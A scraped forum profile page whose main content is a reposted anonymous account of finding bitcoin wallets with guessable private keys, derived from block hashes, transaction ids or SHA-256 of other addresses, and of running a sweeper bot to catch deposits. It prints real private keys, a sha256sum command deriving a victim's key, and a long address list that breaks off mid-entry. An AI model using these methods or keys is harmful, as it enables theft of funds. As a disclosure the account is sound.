Jump to content


Active Members
  • Content count

  • Joined

  • Last visited

  • Days Won


Usr6 last won the day on November 5

Usr6 had the most liked content!

Community Reputation

1984 Excellent


About Usr6

  • Rank
    Registered user
  • Birthday 01/01/19

Profile Information

  • Gender


  • Interests
    Malware Analysis, Software Testing, Reverse , etc.

Recent Profile Visitors

3939 profile views
  1. Story Save and access docs and photos and music on your own local Pi Cloud server! The best part: you can use it if, or when, the Internet goes down (or if you're in a remote spot & want access to Wikipedia). Oh hey, and if your friend gets one and they live close (*ahem*80ft*ahem*), you can share stuff with them and make your own personal chat line! If enough folks built Pi Cloud servers, we could crowdsource the Internet! That would be an 11/10 on a scale of greatness. With the new models of the Raspberry Pi computer, it's possible and not even expensive! (What! Tell me more!) This tutorial will show you how to set up a short-range (~ 80 ft) WiFi Access Point and a personal web server ('bringin it back to HTML bbies). You can set this up as a (closed) local network only (i.e. your own personal "cloud" backup device), or broadcast it to the rest of the world! (..if you do this be sure you know network security.) That said, assuming you have a basic knowledge of the Pi, here's the breakdown: Read Time: ~ 40 min Build Time: ~ 60 min (less if you are experienced w/ Linux) Cost: ~ $35 (for the Pi 3) Link: https://www.hackster.io/jenfoxb0t/make-your-pi-a-local-cloud-server-c4f3f1
  2. InfoCon

    What is InfoCon? InfoCon is a community supported, non-commercial archive of all the past hacking related convention material that can be found. https://infocon.org/
  3. [Nu e greu] La multi ani!

    md5(crack_me.jpg) = C720E708AB375E531BB77DCA9DD08D38
  4. BTC exploit

    NU am citit tot articolul, motiv pentru care topicul e la offtopic, daca cineva are rabdare sa citeasca si informatiile presentate i se par credibile sa lase un comentariu si voi muta topicul ----------- Hi. Thanks for passing this along so it gets some attention. I was worried if I posted this somewhere it would mostly go unnoticed. Also, I'm trying to stay anonymous because I don't want to be accused of being the person who came up with this exploit or be blamed by any company for any damages. It's an interesting technical story so I thought I would share it. -------- story begins here ---------------- I returned 9 BTC to reddit user fitwear who recently claimed were stolen from their blockchain.info wallet. I have evidence that some bitcoin address generation code in the wild is using private keys that can easily be discovered on a regular basis. This is either intentional or by mistake. Some wallets have been compromised by what is probably an innocent looking piece of code. Furthermore, someone has been siphoning bitcoin on a regular basis since 2014 from them. Whether they discovered this by accident (like I did) or are the ones who installed the code themselves, I don't know. It looks like either a clever exploit or a coding error. It could also be yet another piece of malware, however as I explain below, I feel this is less likely the case. In order to fully understand how this works and how I discovered it, please read on. Some Background --------------- I've been following bitcoin since I first heard of it in 2011. One of the things that fascinated me was the ability for someone to create private keys from just about anything using Sha256 (i.e. Sha256(password/phrase)). This, of course, is NOT a recommended way of obtaining a private key since if YOU can think of the word/phrase, someone else can too and the likelihood of your bitcoins being stolen is quite high. The most secure private keys are generated randomly. The probability of someone else being able to generate the same sequence of 32 random bytes is so close to 0, it is highly improbable anyone ever will (given the expected lifespan of the universe). If you peer into the blockchain, you will find that people have 'played' with the chain by sending small amounts of bitcoins to addresses corresponding to private keys generated using Sha256. For example, Sha256 of each word in the entire /usr/dict/words file found on most UNIX systems has had a small amount sent to it. There was a site called brainwallet.org that made it easy for you to convert a phrase into a private key + public address. (The code is still available on GitHub but has since been removed from the Internet). Try using phrases like "i find your lack of faith disturbing", "these aren't the droids you're looking for" or "satoshi nakamoto" as inputs to Sha256. You'll find the addresses corresponding to those private keys have had small amounts sent to them (and transferred out). It's quite obvious these were _meant_ to be found. It turns out there are a lot of these addresses. (Keep looking and you will easily find some.) This is nothing new and has been known to the bitcoin community for a while. I always had the idea in the back of my mind to try and find other non-trivial examples of 'discoverable' private keys. That is, something beyond Sha256(word/phrase). So I decided to try and hunt for buried bitcoin treasure. Perhaps I could find some bitcoin intentionally hidden by someone that hadn't yet been discovered? In the first couple weeks of June 2017, I finally devoted some time to the task. I honestly didn't expect to find much but I was amazed at what I ended up discovering. I began by writing a program to scan every block in the blockchain and record every public address that had ever been used. (Note: I didn't only store addresses for which the balance was greather than zero, I stored ALL of them which is why I believe I ended up accidentally discovering what I did.) There were only about 290 million at the time so this wasn't a big deal. The Experiments --------------- What follows is a description of my experiments and what led me to discover what I believe is either a scam or really bad coding error. Experiment 1 ------------ My first experiment was to see if anyone used a block hash as a private key. That would actually be a nifty way to 'compress' 32 bytes in your head. You would only have to remember the block height (which is only maybe 6 digits) and the corresponding larger 32 byte number would be saved for all time in the chain itself! Results: Success! I found 46 addresses that had some amount of bitcoin sent to them between 2009 and 2016. As expected, these all had 0 balances either because the owner had taken them back or they were discovered by someone else. Here are two examples. You can use blockchain.info to see these hex values are actually block hashes from early in the chain. This happened on/off up until mid-2016. 1Buc1aRXCqdh6r7PRYWPAy3EtVFw5Ue5dk 000000006a625f06636b8bb6ac7b960a8d03705d1ace08b1a19da3fdcc99ddbd 1KLZnkqU94ZKpgtcWCRs1mhqtF23jTLMgr 000000004ebadb55ee9096c9a2f8880e09da59c0d68b1c228da88e48844a1485 Nothing really alarming so far. Experiment 2 ------------ Similar to my first experiment, I then searched for addresses that were generated from the merkle root used as a private key. (BTW, I searched for both compressed/uncompressed keys, so each 32 bytes resulted in two address look-ups from my database). Results: Yes! I found 6 addresses again up until mid-2016. Even though every address I found had a 0 balance (again expected), I was having fun with my success! Example: 13bkBdHRovsBkjM4BUsbcDNr9DCTDcpy9W 6c951c460a4cfe5483863adacafad59e5de7e55876a21857733ca94049d7d10c Similar to merkle root and block hashes, transaction ids (hashes) also seem to have been used as private keys. Still nothing alarming to me thus far. Experiment 3 ------------ I wondered at this point if anyone might have used repeated Sha256 on words. Why stop at just one iteration when you can easily do one million? Also, it becomes less likely to be discovered the more iterations you do. I found a bunch. Here are a few: Sha256('sender') x 2 18aMGf2AxQ3YXyNv9sKxiHYCXcBJeJv9d1 098f6d68ce86adb2d8ba672a06227f7d177baca3568092e4cda159acca5eb0c7 Sha256('receiver') x 2 1C3m5mFx6SjBCpw6qLqzM8izZArVYQ9B5u 6681b4b6aa44318e55a724d7135ff23d76eb75847802cd7d220ecaa8427b91d4 Sha256('hello') x 4 17UZ4iVkmNvKF9K2GWrGyMykX2iuAYbe1X 28b47e9b141279ea00333890e3e3f20652bbd7abc2b66c62c5824d4d6fe50ac9 Sha256('hello') x 65536 1Mi5mVANRNAetbJ21u2hzs28qCJC19VcXY 52fa8b1d9fbb264d53e966809ce550c3ab033248498da5ac0c5ab314ab45198e Sha256('password') x 1975 (This one's my favorite, someone's birth year?) 13mcYPDDktHdjdq9LwchhU5AqkRB1FD6JE 6e8cdae20bef63d33cb6d5f1c6c9c954f3148bfc88ef0aa1b51fd8b12fa9b41c People were obviously burying bitcoin in the chain. Whether they expected the coins to be taken or not, we'll never know. But these methods were still highly 'discoverable' in my opinion. Experiment 4 ------------ My last experiment is the one that led me to believe someone was siphoning bitcoin from some service on a regular basis and has been since 2014. Take a look at this private key: KyTxSACvHPPDWnuE9cVi86kDgs59UFyVwx2Y3LPpAs88TqEdCKvb The public address is: 13JNB8GtymAPaqAoxRZrN2EgmzZLCkbPsh The raw bytes for the private key look like this: 4300d94bef2ee84bd9d0781398fd96daf98e419e403adc41957fb679dfa1facd Looks random enough. However, these bytes are actually sha256 of this public address! 1LGUyTbp7nbqp8NQy2tkc3QEjy7CWwdAJj I discovered this by performing Sha256 on all the public addresses I had collected from the setup of my experiments and then seeing if those addresses (from the generated private keys) were ever used. Bingo! Lots were coming up. I searched a fraction of the chain and found dozens. I also found these addresses had bitcoin sent to them very recently (within weeks/days of when I discovered them.) I asked myself, "Why would someone do this?" At first, I thought this was someone who thought they could get away with having to remember only one piece of information rather than two. Maybe they have one favorite address/private key combo and derived another from that one? I thought it was possible. You could keep doing this in a chain and derive as many as you wanted and only ever have to remember the first one. But I ruled this out for one simple reason; bitcoins transferred into those addresses were being transferred out within minutes or SECONDS. If someone generated these private keys for themselves, then why would the coins be almost immediately transferred out in every case I looked at? Here are some more (complete list at end of this doc): 16FKGvEtu5KPMZqiTK4yjmsSZsJLyxz9fr from Sha256(1CRWfJdgVrfKLRS4G3vTMRhEQrCZZyHNMo) 1HwxL1vutUc42ikh3RBnM4v2dVRHPTrTve from Sha256(1FfmbHfnpaZjKFvyi1okTjJJusN455paPH) 1FNF3xfTE53LVLQMvH6qteVqrNzwn2g2H8 from Sha256(1H21ndKEuMqZbeMMCqrYArCdV8WeicGehB) In every case I looked at, the coins were moved away within minutes or seconds. It was much more likely that a bot was waiting for those coins to show up. Also, transactions are STILL happening to this day on those addresses! But how can that bot know in advance that address was about to receive bitcoins? A Scam or a mistake? -------------------- It is at this point I formed a theory on what was really happening. It is likely that someone installed malicious code into the backend system of a mining pool, an exchange, or possibly wallet generation code. They are using public information so that they can discover the private keys easily and steal the coins on the side. But why would they use Sha256(public_address)? Why not do Sha256(public_address + some super hard to guess random sequence) or just use a hard-coded address? Well, I have a theory on that too. It can't be hard-coded or it would look suspicious in a source code repository. It's likely the code was introduced by someone who works (or worked) for some company connected to bitcoin (exchange/mining pool/gambling site/wallet). Code submitted by developers into source control systems usually goes through a code review process. It would be much easier to hide an innocent looking Sha256 operation inside the millions of lines of code that make up the backend. Sha256 is used all over the place in bitcoin and it wouldn't look suspicious. The function would be readily available. However, if code were to be submitted that performed Sha256(address + "secret_password1234xyz"), that would look VERY suspicious. My guess is someone has slipped in a routine that LOOKS harmless but is actually diverting bitcoin to their awaiting bot ready to gobble them up. It's actually quite clever. No one can know the destination address in advance. You would have to keep performing Sha256 on all public addresses ever used to catch that one in a million transaction. Someone would be able to capture those coins by simply watching for a transaction into an address that corresponds to a private key generated from Sha256 of one of the existing public addresses. Keeping such a database is trivial and lookups are quick. To be fair, I suppose this could be a coding error. Anything is possible with a buffer overflow. I would love to see the code if this is ever found. Transactions were STILL happening right up until a couple weeks before I made this discovery! So I wrote a bot to try and 'catch' a transaction. Mind Blown ---------- Within the FIRST 48 HOURS of my bot going live, on Jun 19, a whopping 9.5 BTC was transferred into an address for which I had the private key. This was approximately worth $23,000 USD at the time. I was shocked. This is the address: 12fcWddtXyxrnxUn6UdmqCbSaVsaYKvHQp The private key is: KzfWTS3FvYWnSnWhncr6CwwfPmuHr1UFqgq6sFkGHf1zc49NirkC whose raw bytes are derived from Sha256 of: 16SH69WgJCXYXWV58sxjTxonhgBh5HCZTt (which appears to be some random address previously used in the chain) BUT... I had failed to test my program sufficiently and it failed to submit the transaction! The 9.5 BTC was sitting there for almost 15 minutes before being swept away by someone else. I honestly didn't think the first amount to cross my radar would be so high. The other samples I found from past transactions were for tiny amounts. It is quite possible that whoever moved them later out of the poisoned address actually owned them. Maybe someone else's sweeper bot only takes small amounts most of the time to avoid attention? At this point, I was pretty confident I was on to something not yet discovered by anyone else. I _could_ have taken those 9.5 BTC and if this was known to others. Also, if you look into the history of that account, 12 BTC was transferred into it (and out right away) only one month earlier. No one has claimed any theft (to my knowledge) involving that address. I fixed my program (actually tested it properly this time) and let it run again. My program detected more transactions (2 within the next 48 hours). I coded my bot to ignore anything less than .1 BTC so I didn't move them. I didn't want to tip off the anyone that I knew what they were doing (if that was indeed the case). Another 3-4 days passed and the next hit my bot detected was for roughly .03 BTC (~$95USD). For some reason, this was not transferred out immediately like the rest. By this time it was July 4th weekend. I let this one sit too and it took a full 7 days before it was moved (not by me). It may have been the legitimate owner or a bot. We'll never know. The destination address was: 1LUqqMzaigWJTzaP79oxsD6zKGifokrh7p The private key raw bytes were: c193edeeb4e7fb5c3e01c3aebd2ec5ac13f349a5a78ca4112ab6a4cbf8e35404 The plot thickens... -------------------- I didn't realize it at the time but that last transfer was into an address for a private key not generated from another public address like the first one. Instead, this address was generated from a transaction id! I had forgotten that I seeded my database with private keys generated with transaction ids as part of one of my earlier experiments. I didn't label them so I didn't know which were from Sha256(pub address) and which were from transaction ids. I found some hits at the time but when I checked the balances for those accounts, they were all zero and I didn't think anything of it. But now my database was detecting ongoing transfers into THOSE addresses (transacton id based) too! Okay, someone was possibly using information from the blockchain itself to ensure private keys were discoverable for the addresses they were funelling bitcoin into. The interesting thing is I found a link between the 12fcWddtXyxrnxUn6UdmqCbSaVsaYKvHQp address (via sha of a public address) AND the 1LUqqMzaigWJTzaP79oxsD6zKGifokrh7p transfer (via the tx id as a key). In the history of both of these addresses, you can see the BTC eventually ended up into this address: 1JCuJXsP6PaVrGBk3uv7DecRC27GGkwFwE Also, the transaction id was for the previous transaction to the one that put the BTC in the toxic (discoverable) address in the first place. Now it became even more clear. The malicious code sometimes used a recent transaction id as the private key for the doomed destination address. Follow the .03 BTC back and you will see what I mean, you eventually get to the txid = private key for that discoverable address. The 1JCuJXsP6PaVrGBk3uv7DecRC27GGkwFwE address is ONE of the collection addresses. I have reason to believe there have been many over the years. This one only goes back to approximately March 2017. You can see in the history of this one address when they consolidated their ill-gotten gains into one transaction back to themselves. I let my bot run longer. The next hit I got was for block hashes that were used as private keys (see Experiment #1). Sure enough, this address also had links to the 1JCuJXsP6PaVrGBk3uv7DecRC27GGkwFwE collection address! And remember my merkle root experiment? I believe those were also part of this. However, I have not linked those to this one particular collection address yet. In the end, I found a total of four different 'discoverable' private key methods being used. I made sure my database was filled with every block hash, merkle root, transaction id and Sha256(public address) for private keys and let my bot run. Transactions for all four types were showing up, again for tiny amounts which I ignored. By this time, I was watching BTC getting taken in small amounts regularly. Sometimes, I saw as many as 6 transactions fly by in one day. How fitwear lost (and got back) 9 BTC ------------------------------------- On Nov 12, my program saw 9 BTC transferred into an address that my database had the private key for. I had searched for that address too to see if anyone was claiming ownership but I didn't see anything. I decided to send a small amount to a well known puzzle address to give the transaction some public scrutiny in an anonymous way (1FLAMEN6, I'm still trying to solve this BTW). Shortly after, I became aware of fitwear's reddit post claiming theft after someone noticed the prize amount had been topped off and linked the two events together. I contacted fitwear privately and returned their coins minus the small amount I sent to the puzzle address. Blockchain.info's original response to his support ticket, was that his system must have been compromised. However, if you read his post, he took every precaution including typing in the key for his paper wallet instead of copy/paste and using 2FA. In his case, in Aug 2017, he imported the private key for his 1Ca15MELG5DzYpUgeXkkJ2Lt7iMa17SwAo paper wallet address into blockchain.info and submitted a test transaction. At some point between then and Nov 12, the compromised 15ZwrzrRj9x4XpnocEGbLuPakzsY2S4Mit got into his online wallet as an 'imported' address. Together, we contacted blockchain.info and I relayed the information I just outlined above to them. Their security team investigated but found no evidence it was their system that was at fault. I suppose it's possible his system was somehow compromised back in August and managed to import a key into blockchain.info without him knowing it. Or someone else logged into his account, imported the key, then waited. I feel the malware/login explanations are much less likely because it looks like code attempting to 'hide in plain sight' to me. You wouldn't need to use Sha256(address) or block hash or txid or merkleroot if you were malware or an unauthorized login. You would at least salt or obscure the key with some bit of knowledge only you know so that only you could derive the private key (as mentioned earlier). The fact that information from the blockchain itself is being used indicates it may be some transaction processing logic. Also, fitwear took extreme precautions (you can read his reddit post for details). The origin of these poison destination addresses remains a mystery. If it's the case that some wallet generation code is doing this, then it may be the case that we're seeing 'change' transactions. When you create a wallet, there maybe 20 addresses generated. They are all supposed to be random keys. If this rogue code creates one of them in this manner (based on the public address string of an earlier one), then at some point, your 'change' will get put back into it as the wallet 'round-robins' through the list. fitwear's 15Z address sat unused until Nov 12 when fitwear transferred his 9 BTC into it using blockchain.info. To see the connection, take a look at this: echo -n "1Ca15MELG5DzYpUgeXkkJ2Lt7iMa17SwAo" | sha256sum 9e027d0086bdb83372f6040765442bbedd35b96e1c861acce5e22e1c4987cd60 That hex number is the private key for 15ZwrzrRj9x4XpnocEGbLuPakzsY2S4Mit !!! fitwear insists he did not import the key for that address. Did Blockchain.info generate it or was it added by mallicious browser code? We may never know. See below for the complete list of other Sha256 based addresses that suffer from the same issue. I believe this is happening for others. It's likely, that the small amounts usually taken are going unnoticed by the owners. What does this mean for bitcoin? Nothing probably. I believe the bitcoin network itself to be secure. However, as long as humans are involved in the services that surround it (mining pools, exchanges, online/mobile wallets) there is always a chance for fraud or error. The bitcoin network itself may be 'trustless', but anything humans touch around its peripheries is certainly not. And you need to use those services to get in/out of the network. So even with bitcoin, it still boils down to trust. To be fair to blockchain.info, only Sha256(public address) (one in particular) was found to be present in one of their wallets. The other 3 methods I described above could be completely unrelated. And they could all possibly be a (really weird) software bug. Here are 100+ addresses that received bitcoins whose private keys are the bytes resulting from Sha256 of another public address. Most of these came from a scan I did of old transactions, not while my bot was running. Blockchain.info told me they do not appear to have been generated by their system. Also, the list of addresses I"m providing are only the subset that have already had some BTC transacted through them. There are likely hundreds more lying dormant inside people's wallets that have not been used yet. Here is the list: 1G2rM4DVncEPJZwz1ubkX6hMzg5dQYxw7b Sha256(1PoHkMExsXDDBxpAwWhzkrM8fabmcPt6f4) 1Kap8hRf8G71kmnE9WKSBp5cJehvTEMVvD Sha256(1LdgEzW8WhkvBxDBQHdvNtbbvdVYbBB2F1) 1LsFFH9yPMgzSzar23Z1XM2ETHyVDGoqd5 Sha256(1FDWY63R3M87KkW2CBWrdDa4h8cZCiov9p) 13eYNM5EpdJS7EeuDefQZmqaokw21re4Ci Sha256(1E7kRki9kJUMYGaNjpvP7FvCmTcQSih7ii) 1CcSiLzGxXopBeXpoNSchagheK9XR61Daz Sha256(191XapdsjZJjReJUbQiWAH3ZVyLcxtcc1Y) 1J9Gtk5i6xHM5XZxQsBn9qdpogznNDhqQD Sha256(16fawJbgd3hgn1vbCb66o8Hx4rn8fWzFfG) 1A17F9NjArUGhkkiATyq4p8hVVEh2GrVah Sha256(1Je3tz5caVsqyjmGgGQV1D59qsCcQYFxAW) 1GGFXUL1GoHcEfVmmQ97getLvnv6eF98Uu Sha256(1DCfq8siEF698EngecE69GxaCqDmQ2dqvq) 14XxBoGgaJd1RcV3TP8M4qeKKFL9yUcef1 Sha256(1Frj1ADstynCYGethjKhDpgjFoKGFsm5w5) 18VZKyyjNR8pZCsdshgto2F1XWCznxs86P Sha256(1FEwM9bq3BnmPLWw5vn162aBKjoYYBfyyi) 12fcWddtXyxrnxUn6UdmqCbSaVsaYKvHQp Sha256(16SH69WgJCXYXWV58sxjTxonhgBh5HCZTt) 19T6HNnmMqEcnSZBVb1BNA6PrAKd5P2qZg Sha256(1Frj1ADstynCYGethjKhDpgjFoKGFsm5w5) 1MWBsFxWJrNtK2cN2Vt7j3a9r5ubfn41nx Sha256(16era4SgYEcbZD1pu6oCBXGXjK2wSrePe8) 1Ns55SngRhshA8kEnyuQ9ELZZPN7ubYfQJ Sha256(1NiNja1bUmhSoTXozBRBEtR8LeF9TGbZBN) 13CnacdjvuuTJkCWrZf33yMrQh5aVX5B14 Sha256(1KPDwnrzJAfD2V4oiPf55WBTAi6UJDvMjN) 1MG1dTqtWVNqq3Qht88Jrie7SXp2ZVkQit Sha256(1UvM3rBJ8Sa1anQ8Du1mj5QZapFmWF7vH) 1DBXjdbMWXmgt81E1W7AYRANVPiq12LsGd Sha256(1Poi5SE42WVR2GKPrwp9U3wYqEBLN6ZV1c) 1GUgTVeSFd2L5zQvpYdQNhPBJPi8cN3i4u Sha256(1EjWVhiTyCdpTa29JJxAVLq27wP4qbtTVY) 1JQ2shEPzkd3ZL3ZQx7gmmxFLvyhSg14cb Sha256(1KEkEmadjTYHCiqhSfourDXavUxaiwoX7f) 125PcPD4QXzgDwNPForSFji8PPZVDr2xkp Sha256(1GRdTKgSq5sY3B4PiALPjKTXSXPXs6Ak7X) 1kN83e7WRtsXD7nHn51fwdEAi51qk5dEe Sha256(1JcsBzKio1curbu9AtxTySxddvT4MKT3Da) 1L5pzdXL4hhtMHNxFXHjjdhhSidY9kJVRk Sha256(1V8tWZw4J3G5kBgafGsfoVSNQEgkxDmeA) 1cQH5XCsezkKt9zpwjHizz8YJZudDSwri Sha256(1AYKSUqCtDX1E34q4YoFnjwWSj41huWgGG) 1DHWP6UjSKBBUR8WzTviWAGNgLfDc6V6iL Sha256(1MbzspFCdXjtqAUx3t6A11vzrk5c847mvE) 1EqSvLnMhbRoqZkYBPapYmUjMS9954wZNR Sha256(1XAeTJCaYJgoBDwqC1rhPhu3oXiKuMs9C) 1MJKz1M7dEQCHPdV5zrLSQPa4BGFAuNJyP Sha256(1BxzenHnSuKwqANALE5THeTCSRZkv3ReRP) 18VZG5Dr8bYJWadHUgh7kC4RPS1VsvH4Ks Sha256(1qA59Na3WysruJbCPoomryDRCtJ4f4aLu) 1CoyRECWJ4LHNiZAgAz9719chFkrDJuNMC Sha256(19o4Yjrd74qnZ3z87C67BShbbF4fSNHy8W) 1ERKXYeaCy97KPdJTRbWjJDVzMbStJYqCm Sha256(1DMwZeQJXfWToRRHr5uRiKeucwDWkWLvkm) 1mbcQaPzsaBoaYP4V6uwCA74BRPhroK3r Sha256(1KzSULbG3fRVjWrpVNLpoB6J62xYL42AdN) 1gHad7cKWDcVKFeKcLRW4FhFAyw2R7FQZ Sha256(1LFCEek8FobJRXb5YrzWJ6M2y8Tx2Xg3NB) 1DvtF6X5b9cBrMZa4Yff9tARCLqP5ZyB47 Sha256(14nuZCWe76kWigUKAjFxyJLFHQyLTsKXYk) 1LzGrd5QX1rG5fk7143ps9isUTEwGyzRJE Sha256(19cMyj9KqVq78yZe32CNhgpyuGLMwM9X8S) 153jMRXn251WyxT9nmJW2XDsFUJ648jyY5 Sha256(1PF2gQPPAwQDfTrSuNX6t8J381D7s3bGFu) 1EFBsAdysTf81k72v9Zqsj3NMuo6KoWD2r Sha256(1BBBvd9G5YThYVVMSGSxJzQvQiQm3WxJC2) 14mRxKmeEw9DCBbpR596FYmfZVdBD8MJxh Sha256(1PLpQDyqDUcpK6fWpRhkkFVBw4tSK4sHkS) 1Hg9pi75XWAT9pB3faXQFKKZbh98cbM5m Sha256(1JoshVWQDa7DzXqN3wQ9dbig5WEfaAzHcM) 1PcExYX3mUJ1rwa4aTLNJUpxqRLU8MxPXm Sha256(1LTZ9kaxRHBZH43eSmZ2KoGLHHUBV3P2S5) 1J9SzdYMZFsLqunQfPAswzogLNBitbREMD Sha256(1A7grBEjor6Sapj8KRbEGj2UrbnNt1Usxo) 1FNF3xfTE53LVLQMvH6qteVqrNzwn2g2H8 Sha256(1H21ndKEuMqZbeMMCqrYArCdV8WeicGehB) 1Q2a1ytfujskCEoXBsjVi1FqKWHegfFKwD Sha256(1LzGrd5QX1rG5fk7143ps9isUTEwGyzRJE) 1PfcpvjYUGu4yvpkEHmAKgDXtsLfSNyzvV Sha256(153jMRXn251WyxT9nmJW2XDsFUJ648jyY5) 1M2uEGihcwUPiRGETE7vF8kUiS2Z4rtV2Q Sha256(1HqQBiqgFK6ChJ2Vq7kbWRCbc73cjyNXv5) 1Kka5bgXvpHTNDsPmhLPHae2qcK9mLS2qS Sha256(1E3D7NabEX971uV2gXT47rWQwPm3zbmvd8) 17hMEK4i8Nsi56huBU4i9N4Gjiw5G6X5iG Sha256(1Nk6a8ZfN86gaHJifcF8iGahx4scCKkwF5) 1DT4Q4ocUFgekXvBqBM6kFmvQYB6Y4PnHo Sha256(19aNbfFfZEWwstuy97C1GsHHELNCxZSEYV) 1CSMVivJfFynvbZRrLFHVGnehpXLUjdGRc Sha256(1p4gsrzTc3mFAgJKYqMzhm6UsJzhgy1KX) 17SaWquajZZBRF5qz6HuXMRt6gvnrDyoqE Sha256(1C1KjGATUXP6L6nnGTAh4LQcnSyLt13XyB) 16eePivj1nTVvLpBGkmFoeGxNyMU7NLbtW Sha256(1K79KaFs4D6wqz1wjP1QoYiY18fw8N3bZo) 1PF2gQPPAwQDfTrSuNX6t8J381D7s3bGFu Sha256(1J9Gtk5i6xHM5XZxQsBn9qdpogznNDhqQD) 1GSkK6KBVSycEU57iK6fRvSXYJ4dgkkuNt Sha256(1JZwnSQz64N3F9D3E24oS4oGhSxMWDsXYM) 12eGusvkCcJb2GWqFvvE1BLDJ8pVX49fQv Sha256(197HxXUSehthdqXM6aEnA1ScDSCR7tQmP3) 134Kia3XhZV6oXE4EUvjc1ES8S8CY7NioU Sha256(1PVn2gxgYB8EcjkpJshJHfDoBoG8BntZWM) 1HMGSkDB9ZhRoUbSEEG6xR7rs9iPT2Ns5B Sha256(1E4yLggKcgHcpSKX336stXWgheNU2serVz) 13qsbkaJM7TkA5F2dsvHeGVQ7kCo74eGxh Sha256(1FAv42GaDuQixSzEzSbx6aP1Kf4WVWpQUY) 1Jsz6mahqVMJn2ayWzN6TfeWTti9tqfbSM Sha256(18AsiEQoLLKaF4Co1z4rxHyzJu9oqTVbFE) 1BwjscJC3P47uW5GXR7tjeHkdXQk6CuAFb Sha256(1JuP7JXhHabGLVAqp9TJj5N171qLVHrcVq) 17kYPYbELyVfMSYihD4YETJSZq5yCs3diM Sha256(1HzJPqLEpbeXiYhyoA8M8cuuds3FEAnw3B) 1C9HtVz7H8NArfV613wQNHs4PrK2oLZEYh Sha256(1EGeEk4YUrXyDL4zNXpWdqJopoVxs2vExJ) 16bEBNuc7JQ4QzyoFAkmxdVvW4wJqicjVN Sha256(12GvGqEQuQTW4Rr8dZ1o397KAYCMGWPYkq) 141V8fK9Kuofit8AXh9SLV9N9bLTfftETA Sha256(15nXjzf8EXy8Lji3czM1HAVw14mEKoEiTw) 19cMyj9KqVq78yZe32CNhgpyuGLMwM9X8S Sha256(17FaMY613bKfwhrdTv5PHnucSGTJBcw3k5) 1CRq6nj3a7vXdJJN2YSWdW6fVwydr6kqWs Sha256(1J1ZPHbbEwgcwniH3F7AgBeFZxQXJoKCGf) 1BVNt39u32LLkxMvBeBHXXNaTJqWe1Xcu5 Sha256(17iLALAyra1W5KSUjjkGN5LeUsWdeoQQx3) 1Mpw88XWQzLTZnq1eNs5SegZYGJu5Epky8 Sha256(1LeuaozTUT5UJX6DD4Q1VJsHh6aHpZ3YRU) 1LkwU9xbVroLkH9EvxDfmMnsCikQzaUv9S Sha256(16bEpxSc1FDyQDXR7ZYKbyyDDxzyaaCnNS) 1D97u8Pet8YmNwKaCPUXLyi4zk1HnLF5RQ Sha256(137XrofaWZhaZW2uB7eDsPjcwCNMTXVLot) 1KyUNmmJu3JjauVEZQUYLUEBg48GXXS1ii Sha256(17S3XjtEFXQoGdXnUjJJtGB1D7PTa9SsLZ) 1HwxL1vutUc42ikh3RBnM4v2dVRHPTrTve Sha256(1FfmbHfnpaZjKFvyi1okTjJJusN455paPH) 137XrofaWZhaZW2uB7eDsPjcwCNMTXVLot Sha256(1JvaK7jYWFNbDsJZLarXnq1iVicFW4UBv5) 1FXi6kEJjnZUBqpwjVJKPsgVHKag86k6qq Sha256(1FEYXtchFFJft6myWc6PyxLCzgdd8EHVUK) 1Gj2uRnxDztM7dTDQEUQGfJg4z5RtAhECh Sha256(1ESkNMa9Z37of4QdJmncvibrXxZ7suPjYm) 1JhWnRjRm7AhbvSBtEifcFL8DkEKQiWRZw Sha256(13Q8rTtdGUUt8Q8ywcEffj4oiNrY6ui3cu) 131XQfvE7E1NzdRQnE8XFmtkxWVRXTsb9q Sha256(1FLeb3zCVG63NYAMBiUoqKYgW1tUwgMMfF) 167dyxowdWwBdofck3WuAwvUpVfn2ewx8Q Sha256(1FFAdm2BWoCfTkTwFLJ4o3b5xG7cuRxbWb) 1CVunYyUpeCFcGAYdHrDNrXcQFBVU8gyo9 Sha256(1BEYFim8uoJ7FAZG6m1E1hqLwKjfVwnWU1) 14XAGCAeUxieSzvGK3TX915PJLvX54n2Pd Sha256(17XQfW1R66aRBNYyJMwzn7zLf3D6sZgda3) 1M5jhEDKQCYbMCXHgcRUmaxwqYmcbrEfGD Sha256(1AixDffKCd1cV1tz1sp8fwJQDEAYCWzQcR) 1HPnYqbMvV4bGRcpSP28mMyekhjKiudcFY Sha256(1C91NNyzXE1dBC4dDKjx6y5VnhihifrpCY) 15XWgB1biKGd1JyuYecobfFtfBcVt6Jnok Sha256(1268xJ8iYUdRxK2vArkyoa5es6bR99hjhR) 1NHvPBaxKFuDec27mWcyCf7szUUvNnfimK Sha256(1LdgEzW8WhkvBxDBQHdvNtbbvdVYbBB2F1) 1AoocdeZC64PaQ15Gbv1kXyYYnN8FWXAST Sha256(1Et9zapAxsBLJ3bvY7LDTuHif5cH7mZiBE) 1NWCqz8nr8ZRZt1zEKidyWcZDyNtK3THps Sha256(17Xok12pBFkXxNcE8J4gTSm3YKkatyX4ad) 1Lv6T9RegiNHpES1DHu6AasDcUqp2SeqLb Sha256(1LDqitspsYaiLH6AMW5EzJYuZG5vTGzRNg) 16FKGvEtu5KPMZqiTK4yjmsSZsJLyxz9fr Sha256(1CRWfJdgVrfKLRS4G3vTMRhEQrCZZyHNMo) 14JpZ9Bogo4p83xt6cKS1Fh1rLSFRat8PN Sha256(1FBxoyGYaC9GEKLokfyrHUbZyoZmmm1ptJ) 1BEYFim8uoJ7FAZG6m1E1hqLwKjfVwnWU1 Sha256(1PfcpvjYUGu4yvpkEHmAKgDXtsLfSNyzvV) 1P9ZZGDG1npYd4d7jiCfPya6LQGkF5sFm7 Sha256(1LFGKkDZ21FZVsBh1A1S5Xr6aXuV3x9N4k) 1JvaK7jYWFNbDsJZLarXnq1iVicFW4UBv5 Sha256(1LdkWzq9DxopPkY1hCmQ3DezenP5PQLNC3) 15RjQKt6D4HBn87QqgbyvhKFNDDjXncp8Y Sha256(1PhmMsdwamJA6soKw5mNMXxzGomHEHWY5P) 1G7B5eVnAQgeuGrKxcRnrmEqPLsjRkgnVF Sha256(1D97u8Pet8YmNwKaCPUXLyi4zk1HnLF5RQ) 192qwAD31JB9jHiAwaTDkd6teb2hLAkY3b Sha256(1PhqA75qNM23aH9zV3uWvUhDbdwcab6q5L) 13mbvCyxCYvATNzranCkQdpCT19VGpMFZa Sha256(1F3sAm6ZtwLAUnj7d38pGFxtP3RVEvtsbV) 1HJx3CqdaHAX6ZYRBHDvM5skg2Vh7GeZBD Sha256(1KrutzZZ7rth6D9wasfGz2oy9R6k1RCL9n) 1HBsFJ9VngvMjaKZjbFhNRaegkjF9NBEe 